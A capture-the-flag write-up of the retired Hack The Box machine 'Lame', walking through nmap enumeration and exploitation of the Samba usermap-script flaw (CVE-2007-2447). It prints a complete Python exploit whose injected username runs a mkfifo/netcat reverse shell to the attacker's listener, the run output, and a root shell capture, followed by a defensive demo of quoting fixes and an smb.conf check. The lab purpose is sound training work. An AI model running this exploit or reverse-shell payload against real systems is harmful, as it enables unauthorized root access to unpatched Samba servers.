HTB – Lame

Today we are going to solve another CTF challenge, "Lame", a lab presented by Hack The Box for online penetration-testing practice at every experience level. They have a collection of vulnerable labs as challenges, from beginner to expert. HTB splits its labs into two groups, active and retired; since write-ups of active labs may not be published, we have chosen the retired Lame lab.

Level: Beginner

Task: find user.txt and root.txt file in victim’s machine.

Let’s begin the Game!!

Since these labs are hosted online they have static IPs; the IP of Lame is 10.10.10.3, so let's begin with nmap port enumeration.

c:\Users\jacco>nmap -sV 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:00 W. Europe Standard Time
Nmap scan report for 10.10.10.3
Host is up (0.033s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.48 seconds

The version scan only tells us "Samba smbd 3.X - 4.X", which is too coarse to pick an exploit, so a second run with nmap's smb-os-discovery script pins down the exact release:

root@kali:/pwk# nmap --script smb-os-discovery.nse -p445 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 07:57 EDT
Nmap scan report for 10.10.10.3
Host is up (0.033s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-os-discovery: 
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name: 
| Workgroup: WORKGROUP\x00
|_ System time: 2019-08-17T04:59:42-04:00

Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds

From the nmap results we see that Samba (smbd 3.x) is running on the victim's machine, and smb-os-discovery narrows it to Samba 3.0.20-Debian. That release falls inside the range affected by CVE-2007-2447 (Samba 3.0.0 through 3.0.25rc3), where the username from an SMB session setup is handed to the shell unescaped whenever the "username map script" option is set in smb.conf.

CVE-2007-2447 – Samba usermap script.

https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

Usage:

$ python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
  • RHOST — The target address
  • RPORT — The target port (TCP 139 or 445; Samba listens on both here, and the run below uses 445)
  • LHOST — The listen address
  • LPORT — The listen port

Installation

sudo apt install python python-pip
pip install --user pysmb
git clone https://github.com/amriunix/CVE-2007-2447.git
┌─[puck@parrot-lt]─[~/htb/lame/CVE-2007-2447]
└──╼ $python usermap_script.py 10.10.10.3 445 10.10.14.10 9001
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
root@kali:~/htb/lame# cat usermap.py
#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
#
# Python 2 script (the installation step above installs python/python-pip and
# pysmb for it). print_function is imported so that the two print forms that
# were mixed in the original both work, under Python 2 as well as Python 3.

from __future__ import print_function
import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
    # Reverse shell without relying on 'nc -e': a named pipe feeds the
    # listener's input to /bin/sh and the shell's output back into nc.
    payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
    # The username is the injection point: an unpatched smbd passes it to the
    # shell unescaped when "username map script" is configured, so the
    # backtick-wrapped command runs with smbd's privileges. nohup keeps the
    # shell alive after the session setup returns.
    username = "/=`nohup " + payload + "`"
    conn = SMBConnection(username, "", "", "")
    try:
        # Authentication with this username is expected to fail or time out;
        # the payload has already fired on the target by then.
        conn.connect(rhost, int(rport), timeout=1)
    except Exception:
        print('[+] Payload was sent - check netcat !')

if __name__ == '__main__':
    print('[*] CVE-2007-2447 - Samba usermap script')
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)
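To see why that backtick-wrapped username is enough, here is a small model of the primitive the exploit relies on, plus the two ways of closing it and a quick smb.conf check. This is example code written for this write-up, not Samba's code and not the exploit author's: the unpatched behaviour is simplified to "interpolate the username inside double quotes into a shell command line that runs the map script", a stand-in `printf` replaces the real map script so the example runs offline, the map-script path and the smb.conf fragment are constructed, and a harmless `echo` stands in for the nohup/nc payload.

```python
#!/usr/bin/env python3
"""Model of the CVE-2007-2447 injection primitive and its mitigation.

Constructed example for this write-up (not Samba's code, not the exploit
above). The vulnerable pattern is modelled as: take the username from the
SMB session setup and drop it, inside double quotes, into a shell command
line that runs the 'username map script'. A stand-in script (printf) just
prints its first argument, so the output is the username the script saw.
"""
import re
import shlex
import subprocess

# Stand-in for the configured map script: prints argv[1] and nothing else.
STAND_IN_SCRIPT = "printf '%s\\n'"

# Same shape as the exploit's username ('/=' + backtick command); a harmless
# echo replaces the reverse-shell payload so the demo is safe to run locally.
MALICIOUS_USERNAME = "/=`echo INJECTED`"


def vulnerable_command(username: str) -> str:
    """Unpatched pattern: the raw username inside double quotes.

    Double quotes do not stop `...` or $(...) expansion, so any command
    substitution in the username runs with the daemon's privileges before
    the map script is even invoked.
    """
    return f'{STAND_IN_SCRIPT} "{username}"'


def hardened_command(username: str) -> str:
    """Same command line, username shell-quoted with shlex.quote.

    shlex.quote wraps unsafe strings in single quotes, and everything inside
    single quotes is literal to the shell, so the backticks reach the script
    as plain characters.
    """
    return f"{STAND_IN_SCRIPT} {shlex.quote(username)}"


def no_shell_invocation(username: str) -> list:
    """Best option: no shell at all. Script and username go out as an argv
    list, so /bin/sh never parses the username. printf is the stand-in."""
    return ["printf", "%s\n", username]


def script_sees(command) -> str:
    """Run a command line via sh -c (str) or an argv list directly (list)
    and return what the stand-in script printed, i.e. the username it got."""
    argv = ["sh", "-c", command] if isinstance(command, str) else command
    proc = subprocess.run(argv, capture_output=True, text=True, check=True)
    return proc.stdout.rstrip("\n")


def username_map_script(smb_conf: str):
    """Return the value of 'username map script' from smb.conf text, or None.

    The injection only exists when this option is set, so grepping for it is
    the quickest configuration audit. Parameter names are matched case-
    insensitively with optional internal whitespace; ';' and '#' lines are
    comments.
    """
    pattern = re.compile(r"^\s*username\s*map\s*script\s*=\s*(.+?)\s*$", re.IGNORECASE)
    for line in smb_conf.splitlines():
        if line.lstrip().startswith(("#", ";")):
            continue
        m = pattern.match(line)
        if m:
            return m.group(1)
    return None


# Constructed smb.conf fragment with a hypothetical script path; not taken
# from the Lame machine.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   ; username map script = /usr/local/bin/old-mapper.sh
   username map script = /etc/samba/scripts/mapusers.sh
"""

if __name__ == "__main__":
    print("vulnerable :", script_sees(vulnerable_command(MALICIOUS_USERNAME)))
    print("hardened   :", script_sees(hardened_command(MALICIOUS_USERNAME)))
    print("no shell   :", script_sees(no_shell_invocation(MALICIOUS_USERNAME)))
    print("map script :", username_map_script(SAMPLE_SMB_CONF))
```

Run it and the vulnerable line prints `/=INJECTED` (the backticks were evaluated by the shell), while both hardened variants print the username verbatim, backticks included. The `username_map_script` check is what you would run against a Samba host you administer: if it returns a path on a 3.0.x build older than 3.0.25, that host is exposed to exactly this username.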

Done. You should receive the connection on your listener. Start netcat before firing the exploit, and make sure LHOST and LPORT match the address and port netcat is actually listening on (the parameters in the run above do not match the capture below, so adjust them to your own setup):

root@kali:~/htb/lame# nc -lvp 443
listening on [any] 443 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.3] 52321
whoami
root

Inside /home/makis I found the user.txt file, and inside /root the root.txt file.

The shell comes back as root straight away because smbd itself runs as root and the injected command inherits its privileges, so no separate privilege-escalation step is needed on this box.

Author: Jacco Straathof
